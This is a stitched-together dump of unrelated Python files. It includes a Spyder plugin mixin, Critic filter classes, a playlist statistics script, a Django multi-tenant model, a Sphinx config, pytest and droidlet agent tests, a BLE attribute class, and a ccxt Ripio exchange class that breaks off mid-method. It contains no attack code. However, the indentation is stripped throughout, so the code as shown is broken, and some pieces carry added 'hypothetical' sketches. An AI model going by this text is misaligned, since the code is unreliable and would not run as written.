self.options_button = create_toolbutton(self, text=_('Options'),
icon=ima.icon('tooloptions'))
self.options_button.setPopupMode(QToolButton.InstantPopup)
# Don't show menu arrow and remove padding
if is_dark_interface():
self.options_button.setStyleSheet(
("QToolButton::menu-indicator{image: none;}\n"
"QToolButton{padding: 3px;}"))
else:
self.options_button.setStyleSheet(
"QToolButton::menu-indicator{image: none;}")
# Options menu
self._options_menu = QMenu(self)
# We decided to create our own toggle action instead of using
# the one that comes with dockwidget because it's not possible
# to raise and focus the plugin with it.
self._toggle_view_action = None
# Default actions for Options menu
self._dock_action = create_action(
self,
_("Dock"),
icon=ima.icon('dock'),
tip=_("Dock the pane"),
triggered=self._close_window)
self._undock_action = create_action(
self,
_("Undock"),
icon=ima.icon('undock'),
tip=_("Undock the pane"),
triggered=self._create_window)
self._close_plugin_action = create_action(
self,
_("Close"),
icon=ima.icon('close_pane'),
tip=_("Close the pane"),
triggered=self._plugin_closed)
def _initialize_plugin_in_mainwindow_layout(self):
"""
If this is the first time the plugin is shown, perform actions to
initialize plugin position in Spyder's window layout.
Use on_first_registration to define the actions to be run
by your plugin
"""
if self.get_option('first_time', True):
try:
self.on_first_registration()
except NotImplementedError:
return
self.set_option('first_time', False)
def _update_margins(self):
"""Update plugin margins"""
layout = self.layout()
if self._default_margins is None:
self._default_margins = layout.getContentsMargins()
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
layout.setContentsMargins(*[margin]*4)
else:
layout.setContentsMargins(*self._default_margins)
def _update_plugin_title(self):
"""Update plugin title, i.e. dockwidget or window title"""
if self.dockwidget is not None:
win = self.dockwidget
elif self._undocked_window is not None:
win = self._undocked_window
else:
return
win.setWindowTitle(self.get_plugin_title())
def _create_dockwidget(self):
"""Add to parent QMainWindow as a dock widget"""
# Creating dock widget
dock = SpyderDockWidget(self.get_plugin_title(), self.main)
# Set properties
dock.setObjectName(self.__class__.__name__+"_dw")
dock.setAllowedAreas(dock.ALLOWED_AREAS)
dock.setFeatures(dock.FEATURES)
dock.setWidget(self)
self._update_margins()
dock.visibilityChanged.connect(self._visibility_changed)
dock.topLevelChanged.connect(self._on_top_level_changed)
dock.sig_plugin_closed.connect(self._plugin_closed)
self.dockwidget = dock
# NOTE: Don't use the default option of CONF.get to assign a
# None shortcut to plugins that don't have one. That will mess
# the creation of our Keyboard Shortcuts prefs page
try:
context = '_'
name = 'switch to {}'.format(self.CONF_SECTION)
self.shortcut = CONF.get_shortcut(context, name,
plugin_name=self.CONF_SECTION)
except (configparser.NoSectionError, configparser.NoOptionError):
pass
if self.shortcut is not None and self.main is not None:
sc = QShortcut(QKeySequence(self.shortcut), self.main,
self.switch_to_plugin)
self.register_shortcut(sc, "_", "Switch to {}".format(
self.CONF_SECTION))
return (dock, dock.LOCATION)
def _switch_to_plugin(self):
"""Switch to plugin."""
if (self.main.last_plugin is not None and
self.main.last_plugin._ismaximized and
self.main.last_plugin is not self):
self.main.maximize_dockwidget()
if not self._toggle_view_action.isChecked():
self._toggle_view_action.setChecked(True)
self._visibility_changed(True)
@Slot()
def _plugin_closed(self):
"""DockWidget was closed."""
if self._toggle_view_action:
self._toggle_view_action.setChecked(False)
def _get_font(self, rich_text=False):
"""Return plugin font."""
if rich_text:
option = 'rich_font'
font_size_delta = self.RICH_FONT_SIZE_DELTA
else:
option = 'font'
font_size_delta = self.FONT_SIZE_DELTA
return get_font(option=option, font_size_delta=font_size_delta)
def set_plugin_font(self):
"""
Set plugin font option.
Note: All plugins in Spyder use a global font. To define a different
size, the plugin must define a 'FONT_SIZE_DELTA' class variable.
"""
raise Exception("Plugins font is based on the general settings, "
"and cannot be set directly on the plugin."
"This method is deprecated.")
def _create_toggle_view_action(self):
"""Associate a toggle view action with each plugin"""
title = self.get_plugin_title()
if self.CONF_SECTION == 'editor':
title = _('Editor')
if self.shortcut is not None:
action = create_action(self, title,
toggled=lambda checked: self.toggle_view(checked),
shortcut=QKeySequence(self.shortcut),
context=Qt.WidgetShortcut)
else:
action = create_action(self, title, toggled=lambda checked:
self.toggle_view(checked))
self._toggle_view_action = action
@Slot()
def _close_window(self):
"""Close QMainWindow instance that contains this plugin."""
if self._undocked_window is not None:
self._undocked_window.close()
self._undocked_window = None
# Oddly, these actions can appear disabled after the Dock
# action is pressed
self._undock_action.setDisabled(False)
self._close_plugin_action.setDisabled(False)
@Slot()
def _create_window(self):
"""Create a QMainWindow instance containing this plugin."""
self._undocked_window = window = PluginWindow(self)
window.setAttribute(Qt.WA_DeleteOnClose)
icon = self.get_plugin_icon()
if is_text_string(icon):
icon = self.get_icon(icon)
window.setWindowIcon(icon)
window.setWindowTitle(self.get_plugin_title())
window.setCentralWidget(self)
window.resize(self.size())
self.refresh_plugin()
self.set_ancestor(window)
self.dockwidget.setFloating(False)
self.dockwidget.setVisible(False)
window.show()
@Slot(bool)
def _on_top_level_changed(self, top_level):
"""Actions to perform when a plugin is undocked to be moved."""
if top_level:
self._undock_action.setDisabled(True)
else:
self._undock_action.setDisabled(False)
def _visibility_changed(self, enable):
"""Dock widget visibility has changed."""
if self.dockwidget is None:
return
if enable:
self.dockwidget.raise_()
widget = self.get_focus_widget()
if widget is not None and self._undocked_window is not None:
widget.setFocus()
visible = self.dockwidget.isVisible() or self._ismaximized
if self.DISABLE_ACTIONS_WHEN_HIDDEN:
toggle_actions(self._plugin_actions, visible)
self._isvisible = enable and visible
if self._isvisible:
self.refresh_plugin()
def _refresh_actions(self):
"""Refresh Options menu."""
self._options_menu.clear()
# Decide what additional actions to show
if self._undocked_window is None:
additional_actions = [MENU_SEPARATOR,
self._undock_action,
self._close_plugin_action]
else:
additional_actions = [MENU_SEPARATOR,
self._dock_action]
# Create actions list
self._plugin_actions = self.get_plugin_actions() + additional_actions
add_actions(self._options_menu, self._plugin_actions)
if sys.platform == 'darwin':
set_menu_icons(self._options_menu, True)
def _setup(self):
"""
Setup Options menu, create toggle action and connect signals.
"""
        # Create toggle view action
self._create_toggle_view_action()
# Create Options menu
self._plugin_actions = self.get_plugin_actions() + [MENU_SEPARATOR,
self._undock_action]
add_actions(self._options_menu, self._plugin_actions)
self.options_button.setMenu(self._options_menu)
self._options_menu.aboutToShow.connect(self._refresh_actions)
# Show icons in Mac plugin menus
if sys.platform == 'darwin':
self._options_menu.aboutToHide.connect(
lambda menu=self._options_menu:
set_menu_icons(menu, False))
# Update title
self.sig_update_plugin_title.connect(self._update_plugin_title)
self.setWindowTitle(self.get_plugin_title())
def _register_shortcut(self, qaction_or_qshortcut, context, name,
add_shortcut_to_tip=False):
"""Register a shortcut associated to a QAction or QShortcut."""
self.main.register_shortcut(
qaction_or_qshortcut,
context,
name,
add_shortcut_to_tip,
self.CONF_SECTION)
def _get_color_scheme(self):
"""Get the current color scheme."""
return get_color_scheme(CONF.get('appearance', 'selected'))
def _add_dockwidget(self):
"""Add dockwidget to the main window and set it up."""
self.main.add_dockwidget(self)
# This is not necessary for the Editor because it calls
# _setup directly on init.
if self.CONF_SECTION != 'editor':
self._setup()
def _tabify(self, core_plugin):
"""Tabify plugin next to a core plugin."""
self.main.tabify_plugins(core_plugin, self)
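# --- Illustrative sketch (assumptions, not Spyder's real plugin classes): the
# mixins above expect the concrete plugin to provide attributes and methods
# such as CONF_SECTION, FONT_SIZE_DELTA, get_plugin_title() and
# get_plugin_actions(), e.g.:
#
#     class MyPluginWidget(BasePluginWidgetMixin, QWidget):
#         CONF_SECTION = 'my_plugin'
#         FONT_SIZE_DELTA = 0
#         DISABLE_ACTIONS_WHEN_HIDDEN = True
#
#         def get_plugin_title(self):
#             return _('My plugin')
#
#         def get_plugin_actions(self):
#             return []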
|
# -*- mode: python; encoding: utf-8 -*-
#
# Copyright 2014 the Critic contributors, Opera Software ASA
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
import api
class RepositoryFilter(object):
def __init__(self, subject_id, filter_type, path, filter_id, repository_id,
delegate_string, repository=None):
self.__subject_id = subject_id
self.__subject = None
self.type = filter_type
self.path = path
self.id = filter_id
self.__repository_id = repository_id
self.__repository = repository
self.__delegate_string = delegate_string
self.__delegates = None
def getSubject(self, critic):
if self.__subject is None:
self.__subject = api.user.fetch(critic, user_id=self.__subject_id)
return self.__subject
def getRepository(self, critic):
if self.__repository is None:
self.__repository = api.repository.fetch(
critic, repository_id=self.__repository_id)
return self.__repository
def getDelegates(self, critic):
if self.__delegates is None:
self.__delegates = frozenset(
api.user.fetch(critic, name=name.strip())
for name in filter(None, self.__delegate_string.split(",")))
return self.__delegates
class ReviewFilter(object):
def __init__(self, subject_id, filter_type, path, filter_id, review_id,
creator_id):
self.__subject_id = subject_id
self.__subject = None
self.type = filter_type
self.path = path
self.id = filter_id
self.__review_id = review_id
self.__review = None
self.__creator_id = creator_id
self.__creator = None
def getSubject(self, critic):
if self.__subject is None:
self.__subject = api.user.fetch(critic, user_id=self.__subject_id)
return self.__subject
def getReview(self, critic):
if self.__review is None:
self.__review = api.review.fetch(critic, review_id=self.__review_id)
return self.__review
def getCreator(self, critic):
if self.__creator is None:
self.__creator = api.user.fetch(critic, user_id=self.__creator_id)
return self.__creator
|
"""
plotStats() collects rating and duration statistics from the track data of a playlist.
Author: Kunal Singh
Email: pykunalsingh@gmail.com
"""
import plistlib

def plotStats(fileName):
# read in a playlist
with open(fileName, 'rb') as fp:
plist = plistlib.load(fp)
# get the tracks from the playlist
tracks = plist['Tracks']
# create lists of songs rating and track durations
ratings = []
durations = []
# iterate through the tracks
for trackId, track in tracks.items():
try:
ratings.append(track['Album Rating'])
durations.append(track['Total Time'])
except:
pass
    # ensure that valid data was collected
if ratings == [] or durations == []:
print("No valid Album Rating/Total Time data in %s."%fileName)
return
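    # --- Hypothetical continuation (not in the original script): a minimal
    # sketch of how the collected ratings/durations could actually be plotted
    # with matplotlib. The scatter-plus-histogram layout is an assumption.
    import matplotlib.pyplot as plt
    # 'Total Time' is stored in milliseconds; convert to minutes for plotting
    durations_min = [d / 60000.0 for d in durations]
    # scatter plot of duration vs. rating
    plt.subplot(2, 1, 1)
    plt.plot(durations_min, ratings, 'o')
    plt.axis([0, 1.05 * max(durations_min), -1, 110])
    plt.xlabel('Track duration (minutes)')
    plt.ylabel('Track rating')
    # histogram of track durations
    plt.subplot(2, 1, 2)
    plt.hist(durations_min, bins=20)
    plt.xlabel('Track duration (minutes)')
    plt.ylabel('Count')
    plt.show()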
|
from django.core.management import call_command
from django.db import connection, connections, models
from tenant_schemas.postgresql_backend.base import _check_schema_name
from tenant_schemas.signals import post_schema_sync
from tenant_schemas.utils import (get_public_schema_name, schema_exists,
MultipleDBError, has_multiple_db, get_db_string)
class TenantQueryset(models.QuerySet):
"""
QuerySet for instances that inherit from the TenantMixin.
"""
def delete(self):
"""
Make sure we call the delete method of each object in the queryset so
that safety checks and schema deletion (if requested) are executed
even when using bulk delete.
"""
counter, counter_dict = 0, {}
for obj in self:
result = obj.delete()
if result is not None:
current_counter, current_counter_dict = result
counter += current_counter
counter_dict.update(current_counter_dict)
if counter:
return counter, counter_dict
class TenantMixin(models.Model):
"""
All tenant models must inherit this class.
"""
auto_drop_schema = False
"""
USE THIS WITH CAUTION!
Set this flag to true on a parent class if you want the schema to be
automatically deleted if the tenant row gets deleted.
"""
auto_create_schema = True
"""
Set this flag to false on a parent class if you don't want the schema
to be automatically created upon save.
"""
domain_url = models.CharField(max_length=128, unique=True)
db_string = models.CharField(max_length=128, blank=True, null=True)
schema_name = models.CharField(max_length=63, unique=True,
validators=[_check_schema_name])
objects = TenantQueryset.as_manager()
class Meta:
abstract = True
def get_db(self, **kwargs):
"""
If single db, return default
If multiple_db and db specified in 'using' kwarg, return db
If request_cfg set through multidb router, return set db
"""
return self.db_string
def save(self, verbosity=1, *args, **kwargs):
is_new = self.pk is None
if not self.db_string:
self.db_string = get_db_string(self.schema_name)
db = self.db_string
from django.db import connection
if db:
connection = connections[db]
if is_new and connection.schema_name != get_public_schema_name():
raise Exception("Can't create tenant outside the public schema. "
"Current schema is %s." % connection.schema_name)
elif not is_new and connection.schema_name not in (self.schema_name, get_public_schema_name()):
raise Exception("Can't update tenant outside it's own schema or "
"the public schema. Current schema is %s."
% connection.schema_name)
super(TenantMixin, self).save(*args, **kwargs)
if is_new and self.auto_create_schema:
try:
self.create_schema(check_if_exists=True, verbosity=verbosity, db=db)
except Exception as e:
# We failed creating the tenant, delete what we created and
# re-raise the exception
self.delete(force_drop=True, using=db)
raise
else:
post_schema_sync.send(sender=TenantMixin, tenant=self)
def delete(self, force_drop=False, *args, **kwargs):
"""
Deletes this row. Drops the tenant's schema if the attribute
        auto_drop_schema is set to True.
"""
from django.db import connection
db = self.db_string
if db:
connection = connections[db]
if connection.schema_name not in (self.schema_name, get_public_schema_name()):
raise Exception("Can't delete tenant outside it's own schema or "
"the public schema. Current schema is %s."
% connection.schema_name)
if schema_exists(self.schema_name) and (self.auto_drop_schema or force_drop):
cursor = connection.cursor()
cursor.execute('DROP SCHEMA IF EXISTS %s CASCADE' % self.schema_name)
return super(TenantMixin, self).delete(*args, **kwargs)
def create_schema(self, check_if_exists=False, sync_schema=True,
verbosity=1, db=None):
"""
Creates the schema 'schema_name' for this tenant. Optionally checks if
the schema already exists before creating it. Returns true if the
schema was created, false otherwise.
"""
# safety check
from django.db import connection, connections
_check_schema_name(self.schema_name)
if db:
connection = connections[db]
cursor = connection.cursor()
if check_if_exists and schema_exists(self.schema_name, db=db):
return False
# create the schema
cursor.execute('CREATE SCHEMA %s' % self.schema_name)
if sync_schema:
if db:
call_command('migrate_schemas',
schema_name=self.schema_name,
interactive=False,
verbosity=verbosity,
database=db)
else:
call_command('migrate_schemas',
schema_name=self.schema_name,
interactive=False,
verbosity=verbosity)
connection.set_schema_to_public()
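# --- Hypothetical usage sketch (the model name and extra field below are
# assumptions, shown only to illustrate how TenantMixin is meant to be used):
#
#     class Client(TenantMixin):
#         name = models.CharField(max_length=100)
#
#     tenant = Client(domain_url='tenant.example.com',
#                     schema_name='tenant1',
#                     name='Example tenant')
#     tenant.save()  # auto_create_schema is True by default, so the schema is
#                    # created and 'migrate_schemas' is run on first save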
|
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('../../'))
# -- Project information -----------------------------------------------------
project = 'IndoFashion: Apparel Classification for Indian Ethnic Clothes'
copyright = '2021, Pranjal Singh Rajput, Shivangi Aneja'
author = 'Pranjal Singh Rajput, Shivangi Aneja'
# The full version, including alpha/beta/rc tags
release = '1.0'
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"recommonmark",
"sphinx.ext.autodoc",
"sphinx.ext.napoleon",
"sphinx.ext.intersphinx",
"sphinx.ext.todo",
"sphinx.ext.coverage",
"sphinx.ext.mathjax",
"sphinx.ext.viewcode",
"sphinx.ext.githubpages",
]
# -- Configurations for plugins ------------
napoleon_google_docstring = True
napoleon_include_init_with_doc = True
napoleon_include_special_with_doc = True
napoleon_numpy_docstring = False
napoleon_use_rtype = False
autodoc_inherit_docstrings = False
autodoc_member_order = "bysource"
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The file extensions of source files. Sphinx considers files with these suffixes
# as sources. The value can also be a dictionary mapping file extensions to file
# types, for example: source_suffix = { '.rst': 'restructuredtext', '.txt': 'restructuredtext', '.md': 'markdown', }
source_suffix = [".rst", ".md"]
# The master toctree document
master_doc = 'index'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use
pygments_style = 'sphinx'
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
def setup(app):
from recommonmark.transform import AutoStructify
app.add_config_value(
"recommonmark_config",
{"enable_math": True, "enable_inline_math": True, "enable_eval_rst": True},
True,
)
app.add_transform(AutoStructify)
|
import sanitize_sheet
import pytest
def test_check_info():
info = ['abcdef']
assert(sanitize_sheet.check_sampleNames(info))
info = ['abcdefghijklmnopqrstuvwxy1234']
with pytest.raises(Exception):
sanitize_sheet.check_info(info)
def test_check_for_sequence():
assert(sanitize_sheet.check_for_sequence([float('nan')]))
assert(sanitize_sheet.check_for_sequence(['filename.seq']))
with pytest.raises(Exception):
sanitize_sheet.check_for_sequence(['ACDEFGHIIH'])
def test_proposalNum():
proposalNums = ['123456']
assert(sanitize_sheet.check_proposalNum(proposalNums))
proposalNums = ['su123456']
with pytest.raises(Exception):
sanitize_sheet.check_proposalNum(proposalNums)
|
"""
Copyright (c) Facebook, Inc. and its affiliates.
"""
import unittest
import droidlet.base_util
import droidlet.lowlevel.minecraft.shape_helpers
import droidlet.lowlevel.minecraft.shapes
import droidlet.lowlevel.minecraft.shapes as shapes
from agents.craftassist.tests.base_craftassist_test_case import BaseCraftassistTestCase
from droidlet.interpreter.tests.all_test_commands import *
class GetMemoryTestCase(BaseCraftassistTestCase):
def setUp(self):
super().setUp()
cube_triples = {"has_name": "cube", "has_shape": "cube"}
self.cube = self.add_object(droidlet.lowlevel.minecraft.shapes.cube(bid=(42, 0)), (9, 63, -2), relations=cube_triples)
sphere_triples = {"has_name": "sphere", "has_shape": "sphere"}
self.sphere = self.add_object(
shapes.sphere(radius=1), (11, 64, 2), relations=sphere_triples
)
triangle_triples = {"has_name": "triangle", "has_shape": "triangle"}
self.triangle = self.add_object(shapes.triangle(), (6, 64, -5), relations=triangle_triples)
self.set_looking_at(list(self.cube.blocks.keys())[0])
def test_get_name_and_left_of(self):
# set the name
name = "fluffball"
self.agent.memory.add_triple(subj=self.cube.memid, pred_text="has_name", obj_text=name)
# get the name
d = GET_MEMORY_COMMANDS["what is where I am looking"]
self.handle_logical_form(d, stop_on_chat=True)
# check that proper chat was sent
self.assertIn(name, self.last_outgoing_chat())
d = GET_MEMORY_COMMANDS["what is to the left of the cube?"]
self.handle_logical_form(d, stop_on_chat=True)
# check that proper chat was sent
self.assertIn("triangle", self.last_outgoing_chat())
d = GET_MEMORY_COMMANDS["what is the thing closest to you?"]
self.handle_logical_form(d, stop_on_chat=True)
# check that proper chat was sent
# note: the agent excludes itself from these by default, maybe fix?
self.assertIn("SPEAKER", self.last_outgoing_chat())
d = GET_MEMORY_COMMANDS["what is the thing closest to me?"]
self.handle_logical_form(d, stop_on_chat=True)
# check that proper chat was sent
# note: the agent does NOT!! exclude SPEAKER...
# FIXME?
self.assertIn("SPEAKER", self.last_outgoing_chat())
def test_what_are_you_doing(self):
d = DANCE_COMMANDS["dance"]
self.handle_logical_form(d)
# start building a cube
d = BUILD_COMMANDS["build a small cube"]
self.handle_logical_form(d, max_steps=9)
# what are you doing?
d = GET_MEMORY_COMMANDS["what are you doing"]
self.handle_logical_form(d, stop_on_chat=True)
# check that proper chat was sent
self.assertIn("build", self.last_outgoing_chat())
assert not "dance" in self.last_outgoing_chat()
def test_what_are_you_building(self):
# start building a cube
d = BUILD_COMMANDS["build a small cube"]
self.handle_logical_form(d, max_steps=12)
# what are you building
d = GET_MEMORY_COMMANDS["what are you building"]
self.handle_logical_form(d, stop_on_chat=True)
# check that proper chat was sent
self.assertIn("cube", self.last_outgoing_chat())
def test_where_are_you_going(self):
# start moving
d = MOVE_COMMANDS["move to 42 65 0"]
self.handle_logical_form(d, max_steps=3)
# where are you going?
d = GET_MEMORY_COMMANDS["where are you going"]
self.handle_logical_form(d, stop_on_chat=True)
# check that proper chat was sent
self.assertIn("42", self.last_outgoing_chat())
self.assertIn("65", self.last_outgoing_chat())
def test_where_are_you(self):
# move to origin
d = MOVE_COMMANDS["move to 0 63 0"]
self.handle_logical_form(d)
# where are you?
d = GET_MEMORY_COMMANDS["where are you"]
self.handle_logical_form(d)
# check that proper chat was sent
loc_in_chat = (
"(0.0, 63.0, 0.0)" in self.last_outgoing_chat()
or "(0, 63, 0)" in self.last_outgoing_chat()
)
assert loc_in_chat
class GetMemoryCountAndSizeTest(BaseCraftassistTestCase):
def setUp(self):
super().setUp()
red_cube_triples = {"has_name": "cube", "has_shape": "cube", "has_colour": "red"}
blue_cube_triples = {"has_name": "cube", "has_shape": "cube", "has_colour": "blue"}
red_sphere_triples = {"has_name": "sphere", "has_shape": "sphere", "has_colour": "red"}
blue_sphere_triples = {"has_name": "sphere", "has_shape": "sphere", "has_colour": "blue"}
self.cube1 = self.add_object(
droidlet.lowlevel.minecraft.shapes.cube(size=2, bid=(35, 14)), (19, 63, 14), relations=red_cube_triples
)
self.cube2 = self.add_object(
droidlet.lowlevel.minecraft.shapes.cube(size=2, bid=(35, 14)), (15, 63, 15), relations=red_cube_triples
)
self.cube3 = self.add_object(
droidlet.lowlevel.minecraft.shapes.cube(size=3, bid=(35, 11)), (14, 63, 19), relations=blue_cube_triples
)
self.sphere1 = self.add_object(
shapes.sphere(bid=(35, 14), radius=2), (14, 63, 8), relations=red_sphere_triples
)
self.sphere2 = self.add_object(
shapes.sphere(bid=(35, 11), radius=2), (8, 63, 14), relations=blue_sphere_triples
)
self.set_looking_at(list(self.cube1.blocks.keys())[0])
def test_counts_and_size(self):
d = GET_MEMORY_COMMANDS["how many cubes are there?"]
self.handle_logical_form(d, stop_on_chat=True)
# check that proper chat was sent
self.assertIn("3", self.last_outgoing_chat())
# Note that the command is slightly malformed, no "memory_type" key
d = GET_MEMORY_COMMANDS["how many blue things are there?"]
self.handle_logical_form(d, stop_on_chat=True)
# check that proper chat was sent
self.assertIn("2", self.last_outgoing_chat())
d = GET_MEMORY_COMMANDS["how many blocks are in the blue cube?"]
self.handle_logical_form(d, stop_on_chat=True)
# check that proper chat was sent
self.assertIn("27", self.last_outgoing_chat())
d = GET_MEMORY_COMMANDS["how tall is the blue cube?"]
self.handle_logical_form(d, stop_on_chat=True)
# check that proper chat was sent
self.assertIn("3", self.last_outgoing_chat())
d = GET_MEMORY_COMMANDS["how wide is the red cube?"]
self.handle_logical_form(d, stop_on_chat=True)
# check that proper chat was sent
self.assertIn("2", self.last_outgoing_chat())
if __name__ == "__main__":
unittest.main()
|
from .ble_attribute_abstract import BleAttributeAbstract
class BleRemoteAttributeAbstract(BleAttributeAbstract):
def __init__(self, params):
super().__init__(params)
self.isRemote = False
self.discoverdOnRemote = False
@property
def ws_child_uuid_name(self):
children_name = self.children_name
if not children_name:
return None
children_name = children_name[:-1]
return children_name + "_uuid"
def get_child(self, uuid):
obj = super().get_child(uuid)
if not obj:
obj = self.add_child({"uuid": uuid})
return obj
# discoverChildren() {}
# discoverChildrenWait() {
# return new Promise(resolve => {
# self.emitter.once('discoverfinished', () => {
# children = self.children.filter(elm => {
# return elm.discoverdOnRemote
# })
# resolve(children)
# })
# self.discoverChildren()
# })
# }
#
# CALLBACKS
#
def ondiscover(self, child):
pass
def ondiscoverfinished(self, children):
pass
def notify_from_server(self, notify_name, params):
super().notify_from_server(notify_name, params)
if notify_name == "discover":
child = self.get_child(params[self.ws_child_uuid_name])
child.discoverdOnRemote = True
child.properties = params.get("properties", [])
self.ondiscover(child)
elif notify_name == "discoverfinished":
children = [elm for elm in self.children if elm.discoverdOnRemote]
self.ondiscoverfinished(children)
|
# -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.base.exchange import Exchange
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import AuthenticationError
from ccxt.base.errors import ArgumentsRequired
from ccxt.base.errors import BadRequest
from ccxt.base.errors import BadSymbol
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidOrder
from ccxt.base.errors import OrderNotFound
from ccxt.base.errors import DDoSProtection
from ccxt.base.decimal_to_precision import TICK_SIZE
from ccxt.base.precise import Precise
class ripio(Exchange):
def describe(self):
return self.deep_extend(super(ripio, self).describe(), {
'id': 'ripio',
'name': 'Ripio',
'countries': ['AR', 'BR'],  # Argentina, Brazil
'rateLimit': 50,
'version': 'v1',
'pro': True,
# new metainfo interface
'has': {
'cancelOrder': True,
'CORS': None,
'createOrder': True,
'fetchBalance': True,
'fetchClosedOrders': True,
'fetchCurrencies': True,
'fetchMyTrades': True,
'fetchOpenOrders': True,
'fetchOrder': True,
'fetchOrderBook': True,
'fetchOrders': True,
'fetchTicker': True,
'fetchTickers': True,
'fetchTrades': True,
},
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/94507548-a83d6a80-0218-11eb-9998-28b9cec54165.jpg',
'api': {
'public': 'https://api.exchange.ripio.com/api',
'private': 'https://api.exchange.ripio.com/api',
},
'www': 'https://exchange.ripio.com',
'doc': [
'https://exchange.ripio.com/en/api/',
],
'fees': 'https://exchange.ripio.com/en/fee',
},
'api': {
'public': {
'get': [
'rate/all/',
'rate/{pair}/',
'orderbook/{pair}/',
'tradehistory/{pair}/',
'pair/',
'currency/',
'orderbook/{pair}/depth/',
],
},
'private': {
'get': [
'balances/exchange_balances/',
'order/{pair}/{order_id}/',
'order/{pair}/',
'trade/{pair}/',
],
'post': [
'order/{pair}/',
'order/{pair}/{order_id}/cancel/',
],
},
},
'fees': {
'trading': {
'tierBased': True,
'percentage': True,
'taker': 0.0 / 100,
'maker': 0.0 / 100,
},
},
'precisionMode': TICK_SIZE,
'requiredCredentials': {
'apiKey': True,
'secret': False,
},
'exceptions': {
'exact': {
},
'broad': {
'Authentication credentials were not provided': AuthenticationError, # {"detail":"Authentication credentials were not provided."}
'Disabled pair': BadSymbol, # {"status_code":400,"errors":{"pair":["Invalid/Disabled pair BTC_ARS"]},"message":"An error has occurred, please check the form."}
'Invalid order type': InvalidOrder, # {"status_code":400,"errors":{"order_type":["Invalid order type. Valid options: ['MARKET', 'LIMIT']"]},"message":"An error has occurred, please check the form."}
'Your balance is not enough': InsufficientFunds, # {"status_code":400,"errors":{"non_field_errors":["Your balance is not enough for self order: You have 0 BTC but you need 1 BTC"]},"message":"An error has occurred, please check the form."}
"Order couldn't be created": ExchangeError, # {'status_code': 400,'errors': {'non_field_errors': _("Order couldn't be created")}, 'message': _('Seems like an unexpected error occurred. Please try again later or write us to support@ripio.com if the problem persists.')}
# {"status_code":404,"errors":{"order":["Order 286e560e-b8a2-464b-8b84-15a7e2a67eab not found."]},"message":"An error has occurred, please check the form."}
# {"status_code":404,"errors":{"trade":["Trade <trade_id> not found."]},"message":"An error has occurred, please check the form."}
'not found': OrderNotFound,
'Invalid pair': BadSymbol, # {"status_code":400,"errors":{"pair":["Invalid pair FOOBAR"]},"message":"An error has occurred, please check the form."}
'amount must be a number': BadRequest, # {"status_code":400,"errors":{"amount":["amount must be a number"]},"message":"An error has occurred, please check the form."}
'Total must be at least': InvalidOrder, # {"status_code":400,"errors":{"non_field_errors":["Total must be at least 10."]},"message":"An error has occurred, please check the form."}
'Account not found': BadRequest, # {"error_description": "Account not found."}, "status": 404
'Wrong password provided': AuthenticationError, # {'error': "Wrong password provided."}, "status_code": 400
'User tokens limit': DDoSProtection, # {'error': "User tokens limit. Can't create more than 10 tokens."}, "status_code": 400
'Something unexpected ocurred': ExchangeError, # {'status_code': 400, 'errors': {'non_field_errors': 'Something unexpected ocurred!'}, 'message': 'Seems like an unexpected error occurred. Please try again later or write us to support@ripio.com if the problem persists.'}
# {'status_code': 404, 'errors': {'account_balance': ['Exchange balance <currency>not found.']},'message': 'An error has occurred, please check the form.'}
# {'status_code': 404, 'errors': {'account_balance': ['Account balance <id> not found.']},'message': 'An error has occurred, please check the form.'}
'account_balance': BadRequest,
},
},
})
def fetch_markets(self, params={}):
response = self.publicGetPair(params)
#
# {
# "next":null,
# "previous":null,
# "results":[
# {
# "base":"BTC",
# "base_name":"Bitcoin",
# "quote":"USDC",
# "quote_name":"USD Coin",
# "symbol":"BTC_USDC",
# "fees":[
# {"traded_volume":0.0,"maker_fee":0.0,"taker_fee":0.0,"cancellation_fee":0.0}
# ],
# "country":"ZZ",
# "enabled":true,
# "priority":10,
# "min_amount":"0.00001",
# "price_tick":"0.000001",
# "min_value":"10",
# "limit_price_threshold":"25.00"
# },
# ]
# }
#
result = []
results = self.safe_value(response, 'results', [])
for i in range(0, len(results)):
market = results[i]
baseId = self.safe_string(market, 'base')
quoteId = self.safe_string(market, 'quote')
id = self.safe_string(market, 'symbol')
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
precision = {
'amount': self.safe_number(market, 'min_amount'),
'price': self.safe_number(market, 'price_tick'),
}
limits = {
'amount': {
'min': self.safe_number(market, 'min_amount'),
'max': None,
},
'price': {
'min': None,
'max': None,
},
'cost': {
'min': self.safe_number(market, 'min_value'),
'max': None,
},
}
active = self.safe_value(market, 'enabled', True)
fees = self.safe_value(market, 'fees', [])
firstFee = self.safe_value(fees, 0, {})
